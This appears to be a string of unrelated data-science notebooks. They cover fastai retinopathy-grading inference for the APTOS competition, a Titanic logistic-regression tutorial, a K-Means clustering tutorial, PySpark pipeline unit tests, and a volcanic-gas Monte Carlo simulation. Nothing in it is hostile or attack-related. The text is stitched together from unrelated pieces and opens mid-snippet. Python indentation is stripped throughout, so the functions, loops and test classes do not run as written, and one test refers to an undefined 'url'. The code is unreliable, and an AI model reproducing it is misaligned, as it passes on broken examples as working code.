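grades = np.digitize(preds_raw, coef)
print(grades)  # [0 1 2 3 4]
```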
# testing
This goes to Kernel!!
## params
```
PRFX = 'CvCropDiabtrn070314'
p_prp = '../output/Prep0703' # needed below to locate the preprocessed images
p_o = f'../output/{PRFX}'
SEED = 111
dbg = False
if dbg:
dbgsz = 500
BS = 128
SZ = 224
from fastai.vision import *
xtra_tfms = []
# xtra_tfms += [rgb_randomize(channel=i, thresh=1e-4) for i in range(3)]
params_tfms = dict(
do_flip=True,
flip_vert=False,
max_rotate=10,
max_warp=0,
max_zoom=1.1,
p_affine=0.5,
max_lighting=0.2,
p_lighting=0.5,
xtra_tfms=xtra_tfms)
resize_method = ResizeMethod.CROP
padding_mode = 'zeros'
USE_TTA = True
import fastai
print(fastai.__version__)
```
## setup
```
import fastai
print('fastai.__version__: ', fastai.__version__)
import random
import numpy as np
import torch
import os
def set_torch_seed(seed=SEED):
os.environ['PYTHONHASHSEED'] = str(seed)
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if torch.cuda.is_available():
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
set_torch_seed()
from fastai import *
from fastai.vision import *
import pandas as pd
```
## preprocess
```
img2grd = []
p = '../input/aptos2019-blindness-detection'
pp = Path(p)
train = pd.read_csv(pp/'train.csv')
test = pd.read_csv(pp/'test.csv')
len_blnd = len(train)
len_blnd_test = len(test)
img2grd_blnd = [(f'{p_prp}/aptos2019-blindness-detection/train_images/{o[0]}.png',o[1]) for o in train.values]
len_blnd, len_blnd_test
img2grd += img2grd_blnd
display(len(img2grd))
display(Counter(o[1] for o in img2grd).most_common())
if np.all([Path(o[0]).exists() for o in img2grd]): print('All files are here!')
df = pd.DataFrame(img2grd)
df.columns = ['fnm', 'target']
df.shape
df.head()
set_torch_seed()
idx_blnd_train = np.where(df.fnm.str.contains('aptos2019-blindness-detection/train_images'))[0]
idx_val = np.random.choice(idx_blnd_train, len_blnd_test, replace=False)
df['is_val']=False
df.loc[idx_val, 'is_val']=True
if dbg:
df=df.head(dbgsz)
```
## dataset
```
tfms = get_transforms(**params_tfms)
def get_data(sz, bs):
src = (ImageList.from_df(df=df,path='./',cols='fnm')
.split_from_df(col='is_val')
.label_from_df(cols='target',
label_cls=FloatList)
)
data= (src.transform(tfms,
size=sz,
resize_method=resize_method,
padding_mode=padding_mode) #Data augmentation
.databunch(bs=bs,num_workers=2) #DataBunch
.normalize(imagenet_stats) #Normalize
)
return data
bs = BS
sz = SZ
set_torch_seed()
data = get_data(sz, bs)
```
## model
```
%%time
# Downloading: "https://download.pytorch.org/models/resnet50-19c8e357.pth" to /tmp/.cache/torch/checkpoints/resnet50-19c8e357.pth
# Making pretrained weights work without needing to find the default filename
if not os.path.exists('/tmp/.cache/torch/checkpoints/'):
os.makedirs('/tmp/.cache/torch/checkpoints/')
!cp '../input/pytorch-vision-pretrained-models/resnet50-19c8e357.pth' '/tmp/.cache/torch/checkpoints/resnet50-19c8e357.pth'
set_torch_seed()
learn = cnn_learner(data,
base_arch = models.resnet50,
path=p_o)
learn.loss_func = MSELossFlat()  # fastai's Learner attribute is loss_func, and the loss must be instantiated
learn = learn.load('mdl')
df_test = pd.read_csv('../input/aptos2019-blindness-detection/test.csv')
df_test.head()
learn.data.add_test(
ImageList.from_df(df_test,
f'{p_prp}/aptos2019-blindness-detection/',
folder='test_images',
suffix='.png'))
%%time
# Predictions for test set
set_torch_seed()
preds_tst_tta, _ = learn.TTA(ds_type=DatasetType.Test)
%%time
# Predictions for test set
set_torch_seed()
preds_tst, _ = learn.get_preds(ds_type=DatasetType.Test)
preds_tst = preds_tst.numpy().squeeze()
preds_tst_tta = preds_tst_tta.numpy().squeeze()
np.save(f'{p_o}/preds_tst.npy', preds_tst)
np.save(f'{p_o}/preds_tst_tta.npy', preds_tst_tta)
preds_tst2use = preds_tst_tta
def bucket(preds_raw, coef = [0.5, 1.5, 2.5, 3.5]):
preds = np.zeros(preds_raw.shape)
for i, pred in enumerate(preds_raw):
if pred < coef[0]:
preds[i] = 0
elif pred >= coef[0] and pred < coef[1]:
preds[i] = 1
elif pred >= coef[1] and pred < coef[2]:
preds[i] = 2
elif pred >= coef[2] and pred < coef[3]:
preds[i] = 3
else:
preds[i] = 4
return preds
import pickle
optnm2qwk = pickle.load(open(f'{p_o}/optnm2qwk.p','rb'))
optnm2coefs = pickle.load(open(f'{p_o}/optnm2coefs.p','rb'))
optnm2qwk
coef = optnm2coefs['abhishek']
preds_tst_grd = bucket(preds_tst2use, coef)
Counter(preds_tst_grd.squeeze()).most_common()
```
## submit
```
subm = pd.read_csv("../input/aptos2019-blindness-detection/test.csv")
subm['diagnosis'] = preds_tst_grd.squeeze().astype(int)
subm.head()
subm.diagnosis.value_counts()
subm.to_csv(f"{p_o}/submission.csv", index=False)
```
---
```
# from https://www.kaggle.com/carlbeckerling/kaggle-titanic-tutorial
import pandas as pd
test = pd.read_csv('./test.csv')
train = pd.read_csv('./train.csv')
test.shape,train.shape
test.info()
train.info()
import matplotlib.pyplot as plt
sex_pivot = train.pivot_table(index='Sex', values='Survived')
sex_pivot.plot.bar()
plt.show()
class_pivot = train.pivot_table(index='Pclass', values='Survived')
class_pivot.plot.bar()
plt.show()
train["Pclass"].unique()
train['Age'].describe()
train['Pclass'].describe()
survived = train[train['Survived'] == 1]
died = train[train['Survived'] == 0]
survived['Age'].plot.hist(alpha=0.5,color='red',bins=50)
died["Age"].plot.hist(alpha=0.5, color='blue', bins=50)
plt.legend(['Survived', 'Died'])
plt.show()
def process_age(df, cut_points, label_names):
df['Age'] = df['Age'].fillna(-0.5)
df['Age_categories'] = pd.cut(df["Age"], cut_points, labels=label_names)
return df
cut_points = [-1, 0, 18, 100]
label_names = ['Missing', 'Child', 'Adult']
train = process_age(train, cut_points, label_names)
test = process_age(test, cut_points, label_names)
train['Age_categories'].describe()
train = process_age(train, [-1,0,5,12,18,35,60,100],['Missing','Infant','Child','Teenage', 'Young', 'Adult', 'Senior'])
age_categories_pivot = train.pivot_table(index='Age_categories', values='Survived')
age_categories_pivot.plot.bar()
plt.show()
def create_dummies(df, column_name):
dummies = pd.get_dummies(df[column_name], prefix=column_name)
df = pd.concat([df, dummies], axis=1)
return df
train = create_dummies(train, 'Pclass')
test = create_dummies(test, 'Pclass')
train.head()
train = create_dummies(train, 'Sex')
test = create_dummies(test, 'Sex')
train = create_dummies(train, 'Age_categories')
test = create_dummies(test, 'Age_categories')
train.head()
test.head()
```
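To see what `create_dummies` produces, here is a toy example (a sketch with made-up data): `pd.get_dummies` expands a categorical column into one indicator column per category, which is then concatenated back onto the frame.

```python
import pandas as pd

df = pd.DataFrame({'Sex': ['male', 'female', 'male']})

# Same steps as create_dummies above: build indicator columns, then concat
dummies = pd.get_dummies(df['Sex'], prefix='Sex')
df = pd.concat([df, dummies], axis=1)
print(df.columns.tolist())  # ['Sex', 'Sex_female', 'Sex_male']
```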
# creating learning model
```
from sklearn.linear_model import LogisticRegression
lr = LogisticRegression()
columns = ['Pclass_2','Pclass_3', 'Sex_male']
lr.fit(train[columns], train['Survived'])
columns = ['Pclass_1', 'Pclass_2', 'Pclass_3', 'Sex_female', 'Sex_male',
'Age_categories_Missing', 'Age_categories_Infant',
'Age_categories_Child', 'Age_categories_Teenage',
'Age_categories_Young', 'Age_categories_Adult',
'Age_categories_Senior']
lr.fit(train[columns], train['Survived'])
```
# splitting training data
```
holdout = test
from sklearn.model_selection import train_test_split
columns = ['Pclass_1', 'Pclass_2', 'Pclass_3', 'Sex_female', 'Sex_male',
'Age_categories_Missing', 'Age_categories_Infant',
'Age_categories_Child', 'Age_categories_Teenage',
'Age_categories_Young', 'Age_categories_Adult',
'Age_categories_Senior']
all_X = train[columns]
all_y = train['Survived']
train_X, test_X, train_y, test_y = train_test_split(all_X, all_y, test_size=0.2, random_state=0)
lr = LogisticRegression()
lr.fit(train_X, train_y)
predictions = lr.predict(test_X)
from sklearn.metrics import accuracy_score
accuracy = accuracy_score(test_y, predictions)
accuracy
from sklearn.metrics import confusion_matrix
conf_matrix = confusion_matrix(test_y, predictions)
pd.DataFrame(conf_matrix, columns=[['Survived', 'Died']], index=[['Survived', 'Died']])
from sklearn.model_selection import cross_val_score
import numpy as np
lr = LogisticRegression()
scores = cross_val_score(lr, all_X, all_y, cv=10)
np.mean(scores)
holdout = process_age(holdout, [-1,0,5,12,18,35,60,100],['Missing','Infant','Child','Teenage', 'Young', 'Adult', 'Senior'])
holdout
columns
lr = LogisticRegression()
lr.fit(all_X, all_y)
holdout_predictions = lr.predict(holdout[columns])
holdout_predictions
columns = ['Pclass_1', 'Pclass_2', 'Pclass_3', 'Sex_female', 'Sex_male',
'Age_categories_Missing','Age_categories_Infant',
'Age_categories_Child', 'Age_categories_Teenage',
'Age_categories_Young', 'Age_categories_Adult',
'Age_categories_Senior']
holdout = holdout.drop(['Age_categories_Adult','Age_categories_Child', 'Age_categories_Missing'], axis=1)
holdout.head()
holdout['Age_categories'].unique()
holdout = create_dummies(holdout, 'Age_categories')
holdout.info()
lr = LogisticRegression()
lr.fit(all_X, all_y)
holdout_predictions = lr.predict(holdout[columns])
holdout_predictions
holdout_ids = holdout["PassengerId"]
submission_df = {"PassengerId": holdout_ids, 'Survived': holdout_predictions}
submission = pd.DataFrame(submission_df)
submission.to_csv('titanic_submission.csv', index=False)
submission.head()
holdout = holdout.drop(['Age_categories_Adult'],axis=1)
holdout.info()
```
---
<small><i>This notebook was put together by [Jake Vanderplas](http://www.vanderplas.com). Source and license info is on [GitHub](https://github.com/jakevdp/sklearn_tutorial/).</i></small>
# Clustering: K-Means In-Depth
Here we'll explore **K Means Clustering**, which is an unsupervised clustering technique.
We'll start with our standard set of initial imports
```
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
plt.style.use('seaborn')
```
## Introducing K-Means
K Means is an algorithm for **unsupervised clustering**: that is, finding clusters in data based on the data attributes alone (not the labels).
K Means is a relatively easy-to-understand algorithm. It searches for cluster centers which are the mean of the points within them, such that every point is closest to the cluster center it is assigned to.
Let's look at how KMeans operates on the simple clusters we looked at previously. To emphasize that this is unsupervised, we'll not plot the colors of the clusters:
```
from sklearn.datasets import make_blobs
X, y = make_blobs(n_samples=300, centers=4,
random_state=0, cluster_std=0.60)
plt.scatter(X[:, 0], X[:, 1], s=50);
```
By eye, it is relatively easy to pick out the four clusters. If you were to perform an exhaustive search for the different segmentations of the data, however, the search space would be exponential in the number of points. Fortunately, there is a well-known *Expectation Maximization (EM)* procedure which scikit-learn implements, so that KMeans can be solved relatively quickly.
```
from sklearn.cluster import KMeans
est = KMeans(4) # 4 clusters
est.fit(X)
y_kmeans = est.predict(X)
plt.scatter(X[:, 0], X[:, 1], c=y_kmeans, s=50, cmap='rainbow');
```
The algorithm identifies the four clusters of points in a manner very similar to what we would do by eye!
## The K-Means Algorithm: Expectation Maximization
K-Means is an example of an algorithm which uses an *Expectation-Maximization* approach to arrive at the solution.
*Expectation-Maximization* is a two-step approach which works as follows:
1. Guess some cluster centers
2. Repeat until converged:
   A. Assign points to the nearest cluster center
   B. Set the cluster centers to the mean of their assigned points
Let's quickly visualize this process:
```
from fig_code import plot_kmeans_interactive
plot_kmeans_interactive();
```
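The two EM steps above can be written in a few lines of plain NumPy. This is an illustrative sketch (`kmeans_em` is a made-up helper, not scikit-learn's implementation, which adds multiple restarts and smarter initialization):

```python
import numpy as np

def kmeans_em(X, k, n_iter=10, seed=0):
    rng = np.random.RandomState(seed)
    centers = X[rng.choice(len(X), k, replace=False)]  # 1. guess some cluster centers
    for _ in range(n_iter):
        # E-step: assign each point to its nearest cluster center
        labels = np.argmin(((X[:, None] - centers[None]) ** 2).sum(-1), axis=1)
        # M-step: move each center to the mean of its assigned points
        centers = np.array([X[labels == j].mean(axis=0) for j in range(k)])
    return centers, labels

# Two well-separated blobs of 50 points each
rng = np.random.RandomState(1)
X = np.vstack([rng.randn(50, 2), rng.randn(50, 2) + 5.0])
centers, labels = kmeans_em(X, 2)
```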
This algorithm will (often) converge to the optimal cluster centers.
### KMeans Caveats
The convergence of this algorithm is not guaranteed; for that reason, scikit-learn by default uses a large number of random initializations and finds the best results.
Also, the number of clusters must be set beforehand... there are other clustering algorithms for which this requirement may be lifted.
## Application of KMeans to Digits
For a closer-to-real-world example, let's again take a look at the digits data. Here we'll use KMeans to automatically cluster the data in 64 dimensions, and then look at the cluster centers to see what the algorithm has found.
```
from sklearn.datasets import load_digits
digits = load_digits()
est = KMeans(n_clusters=10)
clusters = est.fit_predict(digits.data)
est.cluster_centers_.shape
```
We see ten clusters in 64 dimensions. Let's visualize each of these cluster centers to see what they represent:
```
fig = plt.figure(figsize=(8, 3))
for i in range(10):
ax = fig.add_subplot(2, 5, 1 + i, xticks=[], yticks=[])
ax.imshow(est.cluster_centers_[i].reshape((8, 8)), cmap=plt.cm.binary)
```
We see that *even without the labels*, KMeans is able to find clusters whose means are recognizable digits (with apologies to the number 8)!
The cluster labels are permuted; let's fix this:
```
from scipy.stats import mode
labels = np.zeros_like(clusters)
for i in range(10):
mask = (clusters == i)
labels[mask] = mode(digits.target[mask])[0]
```
For good measure, let's use our PCA visualization and look at the true cluster labels and K-means cluster labels:
```
from sklearn.decomposition import PCA
X = PCA(2).fit_transform(digits.data)
kwargs = dict(cmap = plt.cm.get_cmap('rainbow', 10),
edgecolor='none', alpha=0.6)
fig, ax = plt.subplots(1, 2, figsize=(8, 4))
ax[0].scatter(X[:, 0], X[:, 1], c=labels, **kwargs)
ax[0].set_title('learned cluster labels')
ax[1].scatter(X[:, 0], X[:, 1], c=digits.target, **kwargs)
ax[1].set_title('true labels');
```
Just for kicks, let's see how accurate our K-Means classifier is **with no label information:**
```
from sklearn.metrics import accuracy_score
accuracy_score(digits.target, labels)
```
80% – not bad! Let's check-out the confusion matrix for this:
```
from sklearn.metrics import confusion_matrix
print(confusion_matrix(digits.target, labels))
plt.imshow(confusion_matrix(digits.target, labels),
cmap='Blues', interpolation='nearest')
plt.colorbar()
plt.grid(False)
plt.ylabel('true')
plt.xlabel('predicted');
```
Again, this is an 80% classification accuracy for an **entirely unsupervised estimator** which knew nothing about the labels.
## Example: KMeans for Color Compression
One interesting application of clustering is in color image compression. For example, imagine you have an image with millions of colors. In most images, a large number of the colors will be unused, and conversely a large number of pixels will have similar or identical colors.
Scikit-learn has a number of images that you can play with, accessed through the datasets module. For example:
```
from sklearn.datasets import load_sample_image
china = load_sample_image("china.jpg")
plt.imshow(china)
plt.grid(False);
```
The image itself is stored in a 3-dimensional array, of size ``(height, width, RGB)``:
```
china.shape
```
We can envision this image as a cloud of points in a 3-dimensional color space. We'll rescale the colors so they lie between 0 and 1, then reshape the array to be a typical scikit-learn input:
```
X = (china / 255.0).reshape(-1, 3)
print(X.shape)
```
We now have 273,280 points in 3 dimensions.
Our task is to use KMeans to compress the $256^3$ colors into a smaller number (say, 64 colors). Basically, we want to find $N_{color}$ clusters in the data, and create a new image where the true input color is replaced by the color of the closest cluster.
Here we'll use ``MiniBatchKMeans``, a more sophisticated estimator that performs better for larger datasets:
```
from sklearn.cluster import MiniBatchKMeans
# flatten the image into a list of pixel colors
n_colors = 64
X = (china / 255.0).reshape(-1, 3)
model = MiniBatchKMeans(n_colors)
labels = model.fit_predict(X)
colors = model.cluster_centers_
new_image = colors[labels].reshape(china.shape)
new_image = (255 * new_image).astype(np.uint8)
# create and plot the new image
with plt.style.context('seaborn-white'):
plt.figure()
plt.imshow(china)
plt.title('input: 16 million colors')
plt.figure()
plt.imshow(new_image)
plt.title('{0} colors'.format(n_colors))
```
Compare the input and output image: we've reduced the $256^3$ colors to just 64.
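To put a rough number on the compression (a back-of-the-envelope sketch, not part of the original notebook; the 427 × 640 shape is the sample image's): raw pixels cost 24 bits each, while a 64-color indexed image costs log2(64) = 6 bits per pixel plus a small palette:

```python
import numpy as np

height, width, n_colors = 427, 640, 64                # sample-image shape, palette size
raw_bits = height * width * 24                        # 8 bits per RGB channel
palette_bits = n_colors * 24                          # storing the 64 palette colors
indexed_bits = height * width * int(np.log2(n_colors)) + palette_bits
ratio = raw_bits / indexed_bits
print(round(ratio, 2))                                # close to a 4x reduction
```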
```
%run ./dlt
%run ./dlt_workflow_refactored
from pyspark.sql import Row
import unittest
from pyspark.sql.functions import lit
import datetime
timestamp = datetime.datetime.fromisoformat("2000-01-01T00:00:00")
def timestamp_provider():
return lit(timestamp)
from pyspark.sql.functions import when, col
from pyspark.sql import Row
class FunctionUnitTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
container.register(
timestamp_provider=timestamp_provider
)
def test_add_ingest_columns(self):
df = spark.range(1)
df = df.transform(container.add_ingest_columns)
result = df.collect()
self.assertEqual(1, len(result), "Only one record expected")
self.assertIn("ingest_timestamp", df.columns, "Ingest timestamp column not present")
self.assertIn("ingest_source", df.columns, "Ingest source column not present")
self.assertEqual(url.split("/")[-1], result[0].ingest_source, "Ingest source not correct")
self.assertEqual(timestamp, result[0].ingest_timestamp, "Ingest timestamp not correct")
def test_add_processed_timestamp(self):
df = spark.range(1)
df = df.transform(container.add_processed_timestamp)
result = df.collect()
self.assertEqual(1, len(result), "Only one record expected")
self.assertIn("processed_timestamp", df.columns, "Processed timestamp column not present")
self.assertEqual(timestamp, result[0].processed_timestamp, "Processed timestamp not correct")
def test_add_null_index_array(self):
df = spark.createDataFrame([
Row(id=1, test_null=None),
Row(id=2, test_null=1)
])
df = df.transform(container.add_null_index_array)
result = df.collect()
self.assertEqual(2, len(result), "Two records are expected")
self.assertIn("nulls", df.columns, "Nulls column not present")
self.assertIsNone(result[0].test_null, "First record should contain null")
self.assertIsNotNone(result[1].test_null, "Second record should not contain null")
self.assertIn(1, result[0].nulls, "Nulls array should include 1")
        self.assertEqual(0, len(result[1].nulls), "Nulls array should be empty")
def test_filter_null_index_empty(self):
df = spark.createDataFrame([
Row(id=1, test_null=None, nulls=[1]),
Row(id=2, test_null=1, nulls=[])
])
df = df.transform(container.filter_null_index_empty)
result = df.collect()
self.assertEqual(1, len(result), "One record is expected")
        self.assertNotIn("nulls", df.columns, "Nulls column should not be present")
def test_filter_null_index_not_empty(self):
df = spark.createDataFrame([
Row(id=1, test_null=None, nulls=[1]),
Row(id=2, test_null=1, nulls=[])
])
df = df.transform(container.filter_null_index_not_empty)
result = df.collect()
self.assertEqual(1, len(result), "One record is expected")
self.assertIn("nulls", df.columns, "Nulls column not present")
def test_agg_count_by_country(self):
df = spark.createDataFrame([
Row(country="Country0"),
Row(country="Country1"),
Row(country="Country0")
])
df = df.transform(container.agg_count_by_country)
result = df.collect()
self.assertEqual(2, len(result), "Two records expected")
self.assertIn("country", df.columns, "Country column not present")
self.assertIn("count", df.columns, "Count column not present")
d = {r[0]: r[1] for r in result}
self.assertEqual(2, d.get("Country0", -1), "Country0 count should be 2")
self.assertEqual(1, d.get("Country1", -1), "Country1 count should be 1")
```
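The test class above won't run on its own in a notebook. One way to execute it (a sketch assuming the standard-library runner; `SmokeTest` here is a hypothetical stand-in for `FunctionUnitTests`) is to call `unittest.main` with a dummy argv and `exit=False` so the kernel isn't killed:

```python
import unittest

class SmokeTest(unittest.TestCase):  # hypothetical stand-in for FunctionUnitTests
    def test_truth(self):
        self.assertTrue(True)

# argv[0] is ignored; exit=False keeps the notebook kernel alive
result = unittest.main(argv=["ignored"], exit=False).result
print(result.wasSuccessful())
```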
```
import numpy as np
from matplotlib import pyplot as plt
from joblib import Parallel, delayed
import multiprocessing
import time
from tqdm import tqdm
from VolcGases.functions import solve_gases
import warnings
warnings.filterwarnings('ignore')
# The total H and C mass fractions
mCO2tot=1000e-6
mH2Otot=1000e-6
# set total pressure and temperature
T = 1473 # kelvin
P = 1000 # bar
x = 0.01550152865954013
FMQ = 0
# set the Oxygen fugacity to FMQ
A = 25738
B = 9
C = 0.092
log_FMQ = (-A/T+B+C*(P-1)/T)
f_O2 = 10**(log_FMQ+FMQ)
# set to FMQ
start = time.time()
P_H2O,P_H2,P_CO2,P_CO,P_CH4,alphaG,x_CO2,x_H2O = solve_gases(T,P,f_O2,mCO2tot,mH2Otot)
print(time.time()-start)
print('H2O mix rat =','%.2e'%(P_H2O/P))
print('H2 mix rat =','%.2e'%(P_H2/P))
print('CO2 mix rat =','%.2e'%(P_CO2/P))
print('CO mix rat =','%.2e'%(P_CO/P))
print('CH4 mix rat =','%.2e'%(P_CH4/P))
print('alphaG =','%.2e'%alphaG)
# make distributions
np.random.seed(1)
n = 10000
inputs = range(0,n)
# change these too
mCO2toto_r=[-5,-2] # Approximate range in Earth MORB Wallace and Anderson 1999, Marty et al. 2012, Wallace 2005
mH2Ototo_r=[-5,-1] # Dissolved submarine range for Earth Wallace and Anderson 1999
# Figure 10
mCO2totc_r=[-5,-2] # Approximate range in Earth MORB Wallace and Anderson 1999, Marty et al. 2012, Wallace 2005
mH2Ototc_r=[-5,-1] # Dissolved subaerial range for Earth Wallace and Anderson 1999
# Figure 11
mCO2toto = 10**np.random.uniform(low=mCO2toto_r[0], high=mCO2toto_r[1], size=n)
mH2Ototo = 10**np.random.uniform(low=mH2Ototo_r[0], high=mH2Ototo_r[1], size=n)
mCO2totc = 10**np.random.uniform(low=mCO2totc_r[0], high=mCO2totc_r[1], size=n)
mH2Ototc = 10**np.random.uniform(low=mH2Ototc_r[0], high=mH2Ototc_r[1], size=n)
#mCO2totc = mCO2toto
#mH2Ototc = 10**mH2Ototo
# Choose range of T and P and fO2
Tc_r = [873,1973] # coldest magmas to Komatiite magmas (Huppert et al. 1984)
Pc_r = [1e-3,100] # Roughly subaerial degassing pressure range in the solar system
To_r = [873,1973] # coldest magmas to Komatiite magmas (Huppert et al. 1984)
Po_r = [100,1000] # Magma solubility doesn't allow for significant degassing at higher pressure
f_O2_r = [-4,5] # Range of O2 fugacities observed on Earth (Stamper et al. 2014)
# White dwarf pollution is evidence of similar O2 fugacities on exoplanets (Doyle et al. 2019)
# and the range encompasses the O2 fugacity of martian meteorites (Catling and Kasting 2017)
X_r = [0,1] # 0% to 100% subaerial volcanism
LG = 1
Delta_f_O2 = np.random.uniform(low=f_O2_r[0], high=f_O2_r[1], size=n)
Tc = np.random.uniform(low=Tc_r[0], high=Tc_r[1], size=n)
Pc = np.random.uniform(low=Pc_r[0], high=Pc_r[1], size=n)
To = np.random.uniform(low=To_r[0], high=To_r[1], size=n)
Po = np.random.uniform(low=Po_r[0], high=Po_r[1], size=n)
X = np.random.uniform(low=X_r[0], high=X_r[1], size=n)
if LG==1:
# log stuff
Pc_r = [np.log10(Pc_r[0]),np.log10(Pc_r[1])]
Pc = 10**np.random.uniform(low=Pc_r[0], high=Pc_r[1], size=n)
# little bit more to get f_O2
A = 25738
B = 9
C = 0.092
log_fO2_c = (-A/Tc+B+C*(Pc-1)/Tc)+Delta_f_O2
f_O2_c = 10**(log_fO2_c)
log_fO2_o = (-A/To+B+C*(Po-1)/To)+Delta_f_O2
f_O2_o = 10**(log_fO2_o)
# ocean world
def flux_ratios_iter(T,P,f_O2,mCO2tot,mH2Otot):
P_H2O,P_H2,P_CO2,P_CO,P_CH4,alphaG,x_CO2,x_H2O = solve_gases(T,P,f_O2,mCO2tot,mH2Otot)
#CO_CO2 = P_CO/P_CO2
try:
CO_CO2 = P_CO2/P_CO
CO_CH4 = P_CH4/P_CO
except:
CO_CO2 = np.nan
CO_CH4 = np.nan
# CO2 = 1000*alphaG*x*(1/(1-alphaG))*P_CO2/P
# CH4 = 1000*alphaG*x*(1/(1-alphaG))*P_CH4/P
# CO = 1000*alphaG*x*(1/(1-alphaG))*P_CO/P
    if P_H2O == 0:
        print('warning: P_H2O is zero')
CO2 = 1000*alphaG*x*P_CO2/P
CH4 = 1000*alphaG*x*P_CH4/P
CO = 1000*alphaG*x*P_CO/P
return (CO_CO2,CO_CH4,CO,CH4,CO2)
num_cores = multiprocessing.cpu_count()
start = time.time()
resultso = Parallel(n_jobs=num_cores)(delayed(flux_ratios_iter)\
(To[i],Po[i],f_O2_o[i],mCO2toto[i],mH2Ototo[i]) for i in tqdm(inputs))
end = time.time()
print(end-start)
resultso = np.array(resultso)
# mix land-ocean world
def flux_ratios_iter(To,Tc,Po,Pc,f_O2_o,f_O2_c,mCO2toto,mH2Ototo,mCO2totc,mH2Ototc,X):
P_H2O_o,P_H2_o,P_CO2_o,P_CO_o,P_CH4_o,alphaG_o,x_CO2_o,x_H2O_o = solve_gases(To,Po,f_O2_o,mCO2toto,mH2Ototo)
P_H2O_c,P_H2_c,P_CO2_c,P_CO_c,P_CH4_c,alphaG_c,x_CO2_c,x_H2O_c = solve_gases(Tc,Pc,f_O2_c,mCO2totc,mH2Ototc)
# this gives mol gas/kg magma
# CO2_b = X*(1000*alphaG_c*x*(1/(1-alphaG_c))*P_CO2_c/Pc)+(1-X)*(1000*alphaG_o*x*(1/(1-alphaG_o))*P_CO2_o/Po)
# CO_b = X*(1000*alphaG_c*x*(1/(1-alphaG_c))*P_CO_c/Pc)+(1-X)*(1000*alphaG_o*x*(1/(1-alphaG_o))*P_CO_o/Po)
# CH4_b = X*(1000*alphaG_c*x*(1/(1-alphaG_c))*P_CH4_c/Pc)+(1-X)*(1000*alphaG_o*x*(1/(1-alphaG_o))*P_CH4_o/Po)
CO2_b = X*(1000*alphaG_c*x*P_CO2_c/Pc)+(1-X)*(1000*alphaG_o*x*P_CO2_o/Po)
CO_b = X*(1000*alphaG_c*x*P_CO_c/Pc)+(1-X)*(1000*alphaG_o*x*P_CO_o/Po)
CH4_b = X*(1000*alphaG_c*x*P_CH4_c/Pc)+(1-X)*(1000*alphaG_o*x*P_CH4_o/Po)
# this gives mol gas/kg magma
P_CO2_b = X*(P_CO2_c/Pc)+(1-X)*(P_CO2_o/Po)
P_CO_b = X*(P_CO_c/Pc)+(1-X)*(P_CO_o/Po)
P_CH4_b = X*(P_CH4_c/Pc)+(1-X)*(P_CH4_o/Po)
try:
CO_CO2 = P_CO2_b/P_CO_b
CO_CH4 = P_CH4_b/P_CO_b
except:
CO_CO2 = np.nan
CO_CH4 = np.nan
# CO_CO2 = X*(P_CO_c/P_CO2_c)+(1-X)*(P_CO_o/P_CO2_o)
# CO_CH4 = X*(P_CO_c/P_CH4_c)+(1-X)*(P_CO_o/P_CH4_o)
return (CO_CO2,CO_CH4,CO_b,CH4_b,CO2_b)
num_cores = multiprocessing.cpu_count()
start = time.time()
resultsb = Parallel(n_jobs=num_cores)(delayed(flux_ratios_iter)\
(To[i],Tc[i],Po[i],Pc[i],f_O2_o[i],f_O2_c[i],mCO2toto[i],mH2Ototo[i],mCO2totc[i],mH2Ototc[i],X[i]) for i in tqdm(inputs))
end = time.time()
print(end-start)
resultsb = np.array(resultsb)
#np.savetxt('ocean_world.txt',resultso)
#resultso = np.loadtxt('ocean_world.txt')
#np.savetxt('ocean_continent_combo.txt',resultsb)
#resultsb = np.loadtxt('ocean_continent_combo.txt')
plt.rcParams.update({'font.size': 18})
fig,[ax,ax1] = plt.subplots(1,2,figsize=[15,5])
results = resultsb
# xbins = np.linspace(np.log10(min(results[:,1])), np.log10(max(results[:,1])), 20)
# ybins = np.linspace(np.log10(min(results[:,0])), np.log10(max(results[:,0])), 20)
xbins = np.linspace(-27,5, 20)
ybins = np.linspace(-1, 5, 20)
counts1, _, _ = np.histogram2d(np.log10(results[:,1]), np.log10(results[:,0]), bins=(xbins, ybins),density=True)
cs1 = ax1.pcolormesh(xbins, ybins, counts1.T,vmin=0, vmax=np.max(counts1))
#ax1.set_ylabel(r"$\log(\mathrm{CO}/\mathrm{CO_2})$")
#ax1.set_xlabel(r"$\log(\mathrm{CO}/\mathrm{CH_4})$")
ax1.set_ylabel(r"$\log(\mathrm{CO_2}/\mathrm{CO})$")
ax1.set_xlabel(r"$\log(\mathrm{CH_4}/\mathrm{CO})$")
#ax1.set_xticks(np.arange(0,22,5))
#cbar1 = plt.colorbar(cs1,ax=ax1)
#cbar1.set_label("Probability density")
fig.subplots_adjust(right=0.8)
cbar_ax = fig.add_axes([0.82, 0.13, 0.02, 0.74])
cbar = fig.colorbar(cs1, cax=cbar_ax)
results = resultso
# xbins = np.linspace(np.log10(min(results[:,1])), np.log10(max(results[:,1])), 20)
# ybins = np.linspace(np.log10(min(results[:,0])), np.log10(max(results[:,0])), 20)
xbins = np.linspace(-27,5, 20)
ybins = np.linspace(-1, 5, 20)
#counts, _, _ = np.histogram2d(np.log10(results[:,1]), np.log10(results[:,0]), bins=(xbins, ybins),normed=True)
#cs = ax.pcolormesh(xbins, ybins, counts.T,vmin=0, vmax=np.max(counts1))
ax.hist2d(np.log10(results[:,1]), np.log10(results[:,0]),bins=(xbins, ybins),density=True,vmax=np.max(counts1))
#ax.set_ylabel(r"$\log(\mathrm{CO}/\mathrm{CO_2})$")
#ax.set_xlabel(r"$\log(\mathrm{CO}/\mathrm{CH_4})$")
ax.set_ylabel(r"$\log(\mathrm{CO_2}/\mathrm{CO})$")
ax.set_xlabel(r"$\log(\mathrm{CH_4}/\mathrm{CO})$")
#cbar = plt.colorbar(cs,ax=ax)
cbar.set_label("Normalized count")
#ax.set_xticks(np.arange(0,22,5))
plt.subplots_adjust(wspace=.3)
ax.text(-0.15, 1.15, '(a)', transform=ax.transAxes,size=25)
ax1.text(-0.15, 1.15, '(b)', transform=ax1.transAxes,size=25)
ax.set_ylim(ax.get_ylim()[0],ax.get_ylim()[1])
ax.set_xlim(ax.get_xlim()[0],ax.get_xlim()[1])
ax1.set_ylim(ax1.get_ylim()[0],ax1.get_ylim()[1])
ax1.set_xlim(ax1.get_xlim()[0],ax1.get_xlim()[1])
ax.text(0.02, 0.05, 'Ocean world', transform=ax.transAxes,color='w')
